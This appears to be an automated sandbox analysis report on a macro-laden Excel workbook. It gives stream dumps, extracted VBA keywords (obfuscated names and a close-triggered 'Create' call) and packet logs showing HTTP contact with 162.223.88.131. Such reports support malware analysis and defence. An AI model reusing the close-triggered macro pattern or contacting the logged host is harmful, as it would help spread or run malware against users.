                                                                                                                                Contains ObjectPool Stream:
                                                                                                                                Flash Objects Count:
                                                                                                                                Contains VBA Macros:True

                                                                                                                                Summary

                                                                                                                                Code Page:1252
                                                                                                                                Author:Dell
                                                                                                                                Last Saved By:Dell
                                                                                                                                Create Time:2020-11-26 22:27:20
                                                                                                                                Last Saved Time:2020-11-26 22:27:20
                                                                                                                                Security:0

                                                                                                                                Document Summary

                                                                                                                                Document Code Page:1252
                                                                                                                                Thumbnail Scaling Desired:False
                                                                                                                                Contains Dirty Links:False
                                                                                                                                Shared Document:False
                                                                                                                                Changed Hyperlinks:False
                                                                                                                                Application Version:983040

                                                                                                                                Streams with VBA

                                                                                                                                VBA File Name: ThisWorkbook.cls, Stream Size: 741
                                                                                                                                General
                                                                                                                                Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                                                                                                                                VBA File Name:ThisWorkbook.cls
                                                                                                                                Stream Size:741
                                                                                                                                Data ASCII:. . . . A t t r i b u t . e V B _ N a m . e = " T h i . s W o r k b o o . k " . . . . B a s . . . 0 { 0 0 0 2 0 P 8 1 9 - . . 0 . . C # . . . . 4 6 } . | G l . o b a l . . S p a . c . . F a l s e . % . C r e a t a b l . . . P r e d e c l . a . . I d . # T r u . . " E x p o s e . . . . @ T e m p l a t @ e D e r i v . . C . u s t o m i z . D . . 2 P . . . . S u b . . . _ B e f o r . e C l . 9 ( C a n . c e l A s B . o o l e a n ) . . . R a n g e ( " . l 1 : x 2 2 " ) . . S e l e c t . . . . . i
                                                                                                                                Data Raw:01 e1 b2 00 41 74 74 72 69 62 75 74 00 65 20 56 42 5f 4e 61 6d 00 65 20 3d 20 22 54 68 69 00 73 57 6f 72 6b 62 6f 6f 10 6b 22 0d 0a 0a 8c 42 61 73 01 02 8c 30 7b 30 30 30 32 30 50 38 31 39 2d 00 10 30 03 08 43 23 05 12 03 00 34 36 7d 0d 7c 47 6c 10 6f 62 61 6c 01 d0 53 70 61 82 63 01 92 46 61 6c 73 65 0c 25 00 43 72 65 61 74 61 62 6c 01 15 1f 50 72 65 64 65 63 6c 12 61 00 06 49 64

                                                                                                                                VBA Code Keywords

                                                                                                                                Keyword
                                                                                                                                .ShrinkToFit
                                                                                                                                .TintAndShade
                                                                                                                                VB_Name
                                                                                                                                VB_Creatable
                                                                                                                                xlCenter
                                                                                                                                "ThisWorkbook"
                                                                                                                                VB_Exposed
                                                                                                                                .VerticalAlignment
                                                                                                                                .WrapText
                                                                                                                                .Orientation
                                                                                                                                Selection.Borders(xlDiagonalUp).LineStyle
                                                                                                                                .MergeCells
                                                                                                                                rjwylxlpo.Create(rhkjspsuhhjyieimpyhwmgscnnveobpnziu)
                                                                                                                                xlThin
                                                                                                                                Workbook_BeforeClose(Cancel
                                                                                                                                VB_Customizable
                                                                                                                                .ColorIndex
                                                                                                                                .AddIndent
                                                                                                                                Selection.Font.Italic
                                                                                                                                .Weight
                                                                                                                                Selection.Font.Bold
                                                                                                                                xlContext
                                                                                                                                .HorizontalAlignment
                                                                                                                                xlBottom
                                                                                                                                .LineStyle
                                                                                                                                VB_TemplateDerived
                                                                                                                                xlNone
                                                                                                                                xlUnderlineStyleSingle
                                                                                                                                rjwylxlpo
                                                                                                                                Selection.Borders(xlDiagonalDown).LineStyle
                                                                                                                                Selection.Borders(xlEdgeTop)
                                                                                                                                Selection
                                                                                                                                False
                                                                                                                                Selection.Borders(xlEdgeLeft)
                                                                                                                                .IndentLevel
                                                                                                                                Attribute
                                                                                                                                Selection.Font.Underline
                                                                                                                                Private
                                                                                                                                .ReadingOrder
                                                                                                                                xlContinuous
                                                                                                                                VB_PredeclaredId
                                                                                                                                VB_GlobalNameSpace
                                                                                                                                VB_Base
                                                                                                                                uldmbeirq
                                                                                                                                Boolean)
                                                                                                                                rhkjspsuhhjyieimpyhwmgscnnveobpnziu
                                                                                                                                VBA Code
                                                                                                                                VBA File Name: cmajcuhck.cls, Stream Size: 172
                                                                                                                                General
                                                                                                                                Stream Path:_VBA_PROJECT_CUR/VBA/cmajcuhck
                                                                                                                                VBA File Name:cmajcuhck.cls
                                                                                                                                Stream Size:172
                                                                                                                                Data ASCII:. . . . A t t r i b u t . e V B _ N a m . e = " c m a . j c u h c k " . " . . . B a s . . 0 { . 0 0 0 2 0 8 2 0 6 - . . . . C . . . . 4 6 . } . | G l o b a l ! . . S p a c . . F a . l s e . % C r e a . t a b l . . P r e d e c l a . . I d . . # T r u . " E x p . o s e . . . @ T e m . p l a t e D e r . i v . . C u s t o . m i z . D . 2
                                                                                                                                Data Raw:01 a8 b0 00 41 74 74 72 69 62 75 74 00 65 20 56 42 5f 4e 61 6d 00 65 20 3d 20 22 63 6d 61 00 6a 63 75 68 63 6b 22 0d 22 0a 0a 80 42 61 73 02 80 30 7b 00 30 30 30 32 30 38 32 30 36 2d 00 10 04 08 43 05 12 03 00 34 36 02 7d 0d 7c 47 6c 6f 62 61 6c 21 01 ca 53 70 61 63 01 92 46 61 08 6c 73 65 0c 25 43 72 65 61 10 74 61 62 6c 15 1f 50 72 65 20 64 65 63 6c 61 00 06 49 64 11 00 23 54 72

                                                                                                                                VBA Code Keywords

                                                                                                                                Keyword
                                                                                                                                "cmajcuhck"
                                                                                                                                VB_Exposed
                                                                                                                                Attribute
                                                                                                                                VB_Name
                                                                                                                                VB_Creatable
                                                                                                                                VB_PredeclaredId
                                                                                                                                VB_GlobalNameSpace
                                                                                                                                VB_Base
                                                                                                                                VB_Customizable
                                                                                                                                False
                                                                                                                                VB_TemplateDerived
                                                                                                                                VBA Code

                                                                                                                                Streams

                                                                                                                                Stream Path: \x1CompObj, File Type: data, Stream Size: 107
                                                                                                                                General
                                                                                                                                Stream Path:\x1CompObj
                                                                                                                                File Type:data
                                                                                                                                Stream Size:107
                                                                                                                                Entropy:4.18482950044
                                                                                                                                Base64 Encoded:True
                                                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . M i c r o s o f t E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . . 9 . q . . . . . . . . . . . .
                                                                                                                                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 1f 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 228
                                                                                                                                General
                                                                                                                                Stream Path:\x5DocumentSummaryInformation
                                                                                                                                File Type:data
                                                                                                                                Stream Size:228
                                                                                                                                Entropy:2.81409483859
                                                                                                                                Base64 Encoded:False
                                                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . c m a j c u h c k . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . . .
                                                                                                                                Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 b4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 8e 00 00 00 02 00 00 00 e4 04 00 00
                                                                                                                                Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 176
                                                                                                                                General
                                                                                                                                Stream Path:\x5SummaryInformation
                                                                                                                                File Type:data
                                                                                                                                Stream Size:176
                                                                                                                                Entropy:2.97848124527
                                                                                                                                Base64 Encoded:False
                                                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . 8 . . . . . . . @ . . . . . . . P . . . . . . . ` . . . . . . . l . . . . . . . x . . . . . . . . . . . . . . . . . . . D e l l . . . . . . . . . . . . D e l l . . . . @ . . . . . . M C . . . @ . . . . . . M C . . . . . . . . . . .
                                                                                                                                Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 80 00 00 00 06 00 00 00 01 00 00 00 38 00 00 00 04 00 00 00 40 00 00 00 08 00 00 00 50 00 00 00 0c 00 00 00 60 00 00 00 0d 00 00 00 6c 00 00 00 13 00 00 00 78 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 08 00 00 00 44 65 6c 6c 00 00 00 00
                                                                                                                                Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 200638
                                                                                                                                General
                                                                                                                                Stream Path:Workbook
                                                                                                                                File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                Stream Size:200638
                                                                                                                                Entropy:7.92744536188
                                                                                                                                Base64 Encoded:True
                                                                                                                                Data ASCII:. . . . . . . . T 8 . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . D e l l B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . T h i s W o r k b o o k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . P K . 8 . . . . . . . X . @
                                                                                                                                Data Raw:09 08 10 00 00 06 05 00 54 38 cd 07 c1 c0 01 00 06 07 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 04 00 00 44 65 6c 6c 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 480
                                                                                                                                General
                                                                                                                                Stream Path:_VBA_PROJECT_CUR/PROJECT
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Stream Size:480
                                                                                                                                Entropy:5.17210770753
                                                                                                                                Base64 Encoded:True
                                                                                                                                Data ASCII:I D = " { 0 0 0 0 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 0 0 0 0 0 0 0 0 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = c m a j c u h c k / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = 0 . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 5 1 5 3 F D F B 0 1 F B 0 1 F F 0 5 F F 0 5 " . . D P B = " 9 6 9 4 3 A D 6 4 6 F A C 1 1 7 C 1 1 7 3 E E 9 C 2 1 7 9 7 4 A D C 8 0 9 1 C 0 F D
                                                                                                                                Data Raw:49 44 3d 22 7b 30 30 30 30 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 30 30 30 30 30 30 30 30 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 63 6d 61 6a 63 75 68 63 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4e 61 6d 65 3d 22 56 42 41 50 72 6f 6a 65 63 74 22 0d
                                                                                                                                Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 71
                                                                                                                                General
                                                                                                                                Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                                                                                                                                File Type:data
                                                                                                                                Stream Size:71
                                                                                                                                Entropy:3.11579255793
                                                                                                                                Base64 Encoded:False
                                                                                                                                Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . c m a j c u h c k . c . m . a . j . c . u . h . c . k . . . . .
                                                                                                                                Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 63 6d 61 6a 63 75 68 63 6b 00 63 00 6d 00 61 00 6a 00 63 00 75 00 68 00 63 00 6b 00 00 00 00 00
                                                                                                                                Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: ISO-8859 text, with no line terminators, Stream Size: 7
                                                                                                                                General
                                                                                                                                Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                                                                                                                                File Type:ISO-8859 text, with no line terminators
                                                                                                                                Stream Size:7
                                                                                                                                Entropy:1.84237099318
                                                                                                                                Base64 Encoded:False
                                                                                                                                Data ASCII:. a . . . . .
                                                                                                                                Data Raw:cc 61 ff ff 00 00 00
                                                                                                                                Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: data, Stream Size: 220
                                                                                                                                General
                                                                                                                                Stream Path:_VBA_PROJECT_CUR/VBA/dir
                                                                                                                                File Type:data
                                                                                                                                Stream Size:220
                                                                                                                                Entropy:5.55719726367
                                                                                                                                Base64 Encoded:False
                                                                                                                                Data ASCII:. . . . . . . . . . . . 0 . . . . . . . . H . . . . . . . . . . . . . . V B A P r o j e . c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . . . . Q . T . . . " < . . . . . . D . . . . . . . . . T . h i s W o r k b @ o o k G . . . . . . h . i . s . W . . o . r . k . b . . . o . . . . / 2 . / . . u . H . . 1 . . . . . , . C * " . . + . . . . ^ . . . c m a j c u h c . . H . . . . m . a . j j . . u . 5 c . E . . 2 . . . . @ . . .
                                                                                                                                Data Raw:01 d8 b0 80 01 00 04 00 00 00 01 00 30 aa 02 02 90 09 00 20 14 06 48 03 00 a8 80 00 00 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 00 08 05 06 12 09 02 12 a5 95 1f 51 06 54 00 0c 02 22 3c 02 0a 0f 02 b6 02 44 00 13 02 07 ff ff 19 02 1d 54 00 68 69 73 57 6f 72 6b 62 40 6f 6f 6b 47 00 18 01 11 00 00 68 00 69 00 73

                                                                                                                                Network Behavior

                                                                                                                                Network Port Distribution

                                                                                                                                TCP Packets

                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                Nov 28, 2020 12:19:00.858530998 CET4978880192.168.2.4162.223.88.131
                                                                                                                                Nov 28, 2020 12:19:00.976499081 CET8049788162.223.88.131192.168.2.4
                                                                                                                                Nov 28, 2020 12:19:00.976744890 CET4978880192.168.2.4162.223.88.131
                                                                                                                                Nov 28, 2020 12:19:00.988123894 CET4978880192.168.2.4162.223.88.131
                                                                                                                                Nov 28, 2020 12:19:01.000874996 CET4978980192.168.2.4162.223.88.131
                                                                                                                                Nov 28, 2020 12:19:01.106097937 CET8049788162.223.88.131192.168.2.4
                                                                                                                                Nov 28, 2020 12:19:01.110169888 CET8049788162.223.88.131192.168.2.4
                                                                                                                                Nov 28, 2020 12:19:01.110254049 CET8049788162.223.88.131192.168.2.4
                                                                                                                                Nov 28, 2020 12:19:01.110316992 CET8049788162.223.88.131192.168.2.4
                                                                                                                                Nov 28, 2020 12:19:01.110372066 CET4978880192.168.2.4162.223.88.131
                                                                                                                                Nov 28, 2020 12:19:01.110477924 CET8049788162.223.88.131192.168.2.4
                                                                                                                                Nov 28, 2020 12:19:01.110532999 CET8049788162.223.88.131192.168.2.4
                                                                                                                                Nov 28, 2020 12:19:01.110573053 CET8049788162.223.88.131192.168.2.4
                                                                                                                                Nov 28, 2020 12:19:01.110611916 CET8049788162.223.88.131192.168.2.4
                                                                                                                                Nov 28, 2020 12:19:01.110649109 CET8049788162.223.88.131192.168.2.4
                                                                                                                                Nov 28, 2020 12:19:01.110696077 CET8049788162.223.88.131192.168.2.4
                                                                                                                                Nov 28, 2020 12:19:01.110738039 CET8049788162.223.88.131192.168.2.4
                                                                                                                                Nov 28, 2020 12:19:01.111002922 CET4978880192.168.2.4162.223.88.131
                                                                                                                                Nov 28, 2020 12:19:01.118630886 CET8049789162.223.88.131192.168.2.4
                                                                                                                                Nov 28, 2020 12:19:01.118793964 CET4978980192.168.2.4162.223.88.131
                                                                                                                                Nov 28, 2020 12:19:01.123408079 CET4978980192.168.2.4162.223.88.131
                                                                                                                                Nov 28, 2020 12:19:01.228768110 CET8049788162.223.88.131192.168.2.4
                                                                                                                                Nov 28, 2020 12:19:01.228806973 CET8049788162.223.88.131192.168.2.4
                                                                                                                                Nov 28, 2020 12:19:01.228822947 CET8049788162.223.88.131192.168.2.4
                                                                                                                                Nov 28, 2020 12:19:01.228846073 CET8049788162.223.88.131192.168.2.4
                                                                                                                                Nov 28, 2020 12:19:01.228872061 CET8049788162.223.88.131192.168.2.4
                                                                                                                                Nov 28, 2020 12:19:01.228898048 CET8049788162.223.88.131192.168.2.4
                                                                                                                                Nov 28, 2020 12:19:01.228925943 CET8049788162.223.88.131192.168.2.4
                                                                                                                                Nov 28, 2020 12:19:01.228952885 CET8049788162.223.88.131192.168.2.4
                                                                                                                                Nov 28, 2020 12:19:01.228970051 CET4978880192.168.2.4162.223.88.131
                                                                                                                                Nov 28, 2020 12:19:01.228991032 CET8049788162.223.88.131192.168.2.4
                                                                                                                                Nov 28, 2020 12:19:01.229017973 CET8049788162.223.88.131192.168.2.4
                                                                                                                                Nov 28, 2020 12:19:01.229038000 CET8049788162.223.88.131192.168.2.4
                                                                                                                                Nov 28, 2020 12:19:01.229058027 CET8049788162.223.88.131192.168.2.4
                                                                                                                                Nov 28, 2020 12:19:01.229059935 CET4978880192.168.2.4162.223.88.131
                                                                                                                                Nov 28, 2020 12:19:01.229084015 CET4978880192.168.2.4162.223.88.131
                                                                                                                                Nov 28, 2020 12:19:01.229576111 CET4978880192.168.2.4162.223.88.131
                                                                                                                                Nov 28, 2020 12:19:01.229588032 CET8049788162.223.88.131192.168.2.4
                                                                                                                                Nov 28, 2020 12:19:01.229614019 CET8049788162.223.88.131192.168.2.4
                                                                                                                                Nov 28, 2020 12:19:01.229635000 CET8049788162.223.88.131192.168.2.4
                                                                                                                                Nov 28, 2020 12:19:01.229665041 CET8049788162.223.88.131192.168.2.4
                                                                                                                                Nov 28, 2020 12:19:01.229687929 CET8049788162.223.88.131192.168.2.4
                                                                                                                                Nov 28, 2020 12:19:01.229711056 CET8049788162.223.88.131192.168.2.4
                                                                                                                                Nov 28, 2020 12:19:01.229729891 CET8049788162.223.88.131192.168.2.4
                                                                                                                                Nov 28, 2020 12:19:01.229731083 CET4978880192.168.2.4162.223.88.131
                                                                                                                                Nov 28, 2020 12:19:01.229751110 CET8049788162.223.88.131192.168.2.4
                                                                                                                                Nov 28, 2020 12:19:01.229767084 CET4978880192.168.2.4162.223.88.131
                                                                                                                                Nov 28, 2020 12:19:01.229798079 CET4978880192.168.2.4162.223.88.131
                                                                                                                                Nov 28, 2020 12:19:01.241177082 CET8049789162.223.88.131192.168.2.4
                                                                                                                                Nov 28, 2020 12:19:01.244685888 CET8049789162.223.88.131192.168.2.4
                                                                                                                                Nov 28, 2020 12:19:01.244718075 CET8049789162.223.88.131192.168.2.4
                                                                                                                                Nov 28, 2020 12:19:01.244743109 CET8049789162.223.88.131192.168.2.4
                                                                                                                                Nov 28, 2020 12:19:01.244769096 CET8049789162.223.88.131192.168.2.4
                                                                                                                                Nov 28, 2020 12:19:01.244777918 CET4978980192.168.2.4162.223.88.131
                                                                                                                                Nov 28, 2020 12:19:01.244795084 CET8049789162.223.88.131192.168.2.4
                                                                                                                                Nov 28, 2020 12:19:01.244822025 CET8049789162.223.88.131192.168.2.4
                                                                                                                                Nov 28, 2020 12:19:01.244838953 CET4978980192.168.2.4162.223.88.131
                                                                                                                                Nov 28, 2020 12:19:01.244879007 CET4978980192.168.2.4162.223.88.131
                                                                                                                                Nov 28, 2020 12:19:01.244981050 CET8049789162.223.88.131192.168.2.4
                                                                                                                                Nov 28, 2020 12:19:01.245008945 CET8049789162.223.88.131192.168.2.4
                                                                                                                                Nov 28, 2020 12:19:01.245042086 CET8049789162.223.88.131192.168.2.4
                                                                                                                                Nov 28, 2020 12:19:01.245059967 CET4978980192.168.2.4162.223.88.131
                                                                                                                                Nov 28, 2020 12:19:01.245070934 CET8049789162.223.88.131192.168.2.4
                                                                                                                                Nov 28, 2020 12:19:01.245131016 CET4978980192.168.2.4162.223.88.131
                                                                                                                                Nov 28, 2020 12:19:01.254086018 CET4978980192.168.2.4162.223.88.131
                                                                                                                                Nov 28, 2020 12:19:01.347009897 CET8049788162.223.88.131192.168.2.4
                                                                                                                                Nov 28, 2020 12:19:01.347065926 CET8049788162.223.88.131192.168.2.4
                                                                                                                                Nov 28, 2020 12:19:01.347104073 CET8049788162.223.88.131192.168.2.4
                                                                                                                                Nov 28, 2020 12:19:01.347146034 CET8049788162.223.88.131192.168.2.4
                                                                                                                                Nov 28, 2020 12:19:01.347182989 CET4978880192.168.2.4162.223.88.131
                                                                                                                                Nov 28, 2020 12:19:01.347183943 CET8049788162.223.88.131192.168.2.4
                                                                                                                                Nov 28, 2020 12:19:01.347228050 CET4978880192.168.2.4162.223.88.131
                                                                                                                                Nov 28, 2020 12:19:01.347234964 CET8049788162.223.88.131192.168.2.4
                                                                                                                                Nov 28, 2020 12:19:01.347278118 CET8049788162.223.88.131192.168.2.4
                                                                                                                                Nov 28, 2020 12:19:01.347294092 CET4978880192.168.2.4162.223.88.131
                                                                                                                                Nov 28, 2020 12:19:01.347318888 CET8049788162.223.88.131192.168.2.4
                                                                                                                                Nov 28, 2020 12:19:01.347359896 CET8049788162.223.88.131192.168.2.4
                                                                                                                                Nov 28, 2020 12:19:01.347398043 CET8049788162.223.88.131192.168.2.4
                                                                                                                                Nov 28, 2020 12:19:01.347435951 CET8049788162.223.88.131192.168.2.4
                                                                                                                                Nov 28, 2020 12:19:01.347446918 CET4978880192.168.2.4162.223.88.131
                                                                                                                                Nov 28, 2020 12:19:01.347476959 CET8049788162.223.88.131192.168.2.4
                                                                                                                                Nov 28, 2020 12:19:01.347516060 CET8049788162.223.88.131192.168.2.4
                                                                                                                                Nov 28, 2020 12:19:01.347524881 CET4978880192.168.2.4162.223.88.131
                                                                                                                                Nov 28, 2020 12:19:01.347563028 CET8049788162.223.88.131192.168.2.4
                                                                                                                                Nov 28, 2020 12:19:01.347578049 CET4978880192.168.2.4162.223.88.131
                                                                                                                                Nov 28, 2020 12:19:01.347605944 CET8049788162.223.88.131192.168.2.4
                                                                                                                                Nov 28, 2020 12:19:01.347645044 CET8049788162.223.88.131192.168.2.4
                                                                                                                                Nov 28, 2020 12:19:01.347651958 CET4978880192.168.2.4162.223.88.131
                                                                                                                                Nov 28, 2020 12:19:01.347685099 CET8049788162.223.88.131192.168.2.4
                                                                                                                                Nov 28, 2020 12:19:01.347726107 CET8049788162.223.88.131192.168.2.4
                                                                                                                                Nov 28, 2020 12:19:01.347739935 CET4978880192.168.2.4162.223.88.131
                                                                                                                                Nov 28, 2020 12:19:01.347764969 CET8049788162.223.88.131192.168.2.4
                                                                                                                                Nov 28, 2020 12:19:01.347796917 CET4978880192.168.2.4162.223.88.131
                                                                                                                                Nov 28, 2020 12:19:01.347805023 CET8049788162.223.88.131192.168.2.4
                                                                                                                                Nov 28, 2020 12:19:01.347846031 CET8049788162.223.88.131192.168.2.4
                                                                                                                                Nov 28, 2020 12:19:01.347893953 CET8049788162.223.88.131192.168.2.4
                                                                                                                                Nov 28, 2020 12:19:01.347904921 CET4978880192.168.2.4162.223.88.131
                                                                                                                                Nov 28, 2020 12:19:01.347938061 CET8049788162.223.88.131192.168.2.4
                                                                                                                                Nov 28, 2020 12:19:01.347955942 CET4978880192.168.2.4162.223.88.131
                                                                                                                                Nov 28, 2020 12:19:01.347976923 CET8049788162.223.88.131192.168.2.4

                                                                                                                                UDP Packets

                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                Nov 28, 2020 12:17:21.332910061 CET5172653192.168.2.48.8.8.8
                                                                                                                                Nov 28, 2020 12:17:21.360320091 CET53517268.8.8.8192.168.2.4
                                                                                                                                Nov 28, 2020 12:17:22.138181925 CET5679453192.168.2.48.8.8.8
                                                                                                                                Nov 28, 2020 12:17:22.165509939 CET53567948.8.8.8192.168.2.4
                                                                                                                                Nov 28, 2020 12:17:22.920959949 CET5653453192.168.2.48.8.8.8
                                                                                                                                Nov 28, 2020 12:17:22.956176043 CET53565348.8.8.8192.168.2.4
                                                                                                                                Nov 28, 2020 12:17:23.712656021 CET5662753192.168.2.48.8.8.8
                                                                                                                                Nov 28, 2020 12:17:23.740242958 CET53566278.8.8.8192.168.2.4
                                                                                                                                Nov 28, 2020 12:17:24.773469925 CET5662153192.168.2.48.8.8.8
                                                                                                                                Nov 28, 2020 12:17:24.800472975 CET53566218.8.8.8192.168.2.4
                                                                                                                                Nov 28, 2020 12:17:25.581907988 CET6311653192.168.2.48.8.8.8
                                                                                                                                Nov 28, 2020 12:17:25.617285013 CET53631168.8.8.8192.168.2.4
                                                                                                                                Nov 28, 2020 12:17:26.453622103 CET6407853192.168.2.48.8.8.8
                                                                                                                                Nov 28, 2020 12:17:26.480551958 CET53640788.8.8.8192.168.2.4
                                                                                                                                Nov 28, 2020 12:17:29.933207989 CET6480153192.168.2.48.8.8.8
                                                                                                                                Nov 28, 2020 12:17:29.960376024 CET53648018.8.8.8192.168.2.4
                                                                                                                                Nov 28, 2020 12:17:32.152647018 CET6172153192.168.2.48.8.8.8
                                                                                                                                Nov 28, 2020 12:17:32.188282967 CET53617218.8.8.8192.168.2.4
                                                                                                                                Nov 28, 2020 12:17:33.401086092 CET5125553192.168.2.48.8.8.8
                                                                                                                                Nov 28, 2020 12:17:33.432478905 CET6152253192.168.2.48.8.8.8
                                                                                                                                Nov 28, 2020 12:17:33.436875105 CET53512558.8.8.8192.168.2.4
                                                                                                                                Nov 28, 2020 12:17:33.459652901 CET53615228.8.8.8192.168.2.4
                                                                                                                                Nov 28, 2020 12:17:33.733511925 CET5233753192.168.2.48.8.8.8
                                                                                                                                Nov 28, 2020 12:17:33.769433022 CET53523378.8.8.8192.168.2.4
                                                                                                                                Nov 28, 2020 12:17:34.738508940 CET5233753192.168.2.48.8.8.8
                                                                                                                                Nov 28, 2020 12:17:34.774379015 CET53523378.8.8.8192.168.2.4
                                                                                                                                Nov 28, 2020 12:17:35.631395102 CET5504653192.168.2.48.8.8.8
                                                                                                                                Nov 28, 2020 12:17:35.658701897 CET53550468.8.8.8192.168.2.4
                                                                                                                                Nov 28, 2020 12:17:35.753726959 CET5233753192.168.2.48.8.8.8
                                                                                                                                Nov 28, 2020 12:17:35.789321899 CET53523378.8.8.8192.168.2.4
                                                                                                                                Nov 28, 2020 12:17:36.445929050 CET4961253192.168.2.48.8.8.8
                                                                                                                                Nov 28, 2020 12:17:36.473037958 CET53496128.8.8.8192.168.2.4
                                                                                                                                Nov 28, 2020 12:17:37.243171930 CET4928553192.168.2.48.8.8.8
                                                                                                                                Nov 28, 2020 12:17:37.270522118 CET53492858.8.8.8192.168.2.4
                                                                                                                                Nov 28, 2020 12:17:37.753932953 CET5233753192.168.2.48.8.8.8
                                                                                                                                Nov 28, 2020 12:17:37.780894041 CET53523378.8.8.8192.168.2.4
                                                                                                                                Nov 28, 2020 12:17:38.226752996 CET5060153192.168.2.48.8.8.8
                                                                                                                                Nov 28, 2020 12:17:38.261991978 CET53506018.8.8.8192.168.2.4
                                                                                                                                Nov 28, 2020 12:17:39.311772108 CET6087553192.168.2.48.8.8.8
                                                                                                                                Nov 28, 2020 12:17:39.339128017 CET53608758.8.8.8192.168.2.4
                                                                                                                                Nov 28, 2020 12:17:41.769870996 CET5233753192.168.2.48.8.8.8
                                                                                                                                Nov 28, 2020 12:17:41.805520058 CET53523378.8.8.8192.168.2.4
                                                                                                                                Nov 28, 2020 12:17:45.844913960 CET5644853192.168.2.48.8.8.8
                                                                                                                                Nov 28, 2020 12:17:45.872251034 CET53564488.8.8.8192.168.2.4
                                                                                                                                Nov 28, 2020 12:18:00.920670033 CET5917253192.168.2.48.8.8.8
                                                                                                                                Nov 28, 2020 12:18:00.998621941 CET53591728.8.8.8192.168.2.4
                                                                                                                                Nov 28, 2020 12:18:01.518048048 CET6242053192.168.2.48.8.8.8
                                                                                                                                Nov 28, 2020 12:18:01.553553104 CET53624208.8.8.8192.168.2.4
                                                                                                                                Nov 28, 2020 12:18:02.112199068 CET6057953192.168.2.48.8.8.8
                                                                                                                                Nov 28, 2020 12:18:02.147770882 CET53605798.8.8.8192.168.2.4
                                                                                                                                Nov 28, 2020 12:18:02.461190939 CET5018353192.168.2.48.8.8.8
                                                                                                                                Nov 28, 2020 12:18:02.496500015 CET53501838.8.8.8192.168.2.4
                                                                                                                                Nov 28, 2020 12:18:02.738502026 CET6153153192.168.2.48.8.8.8
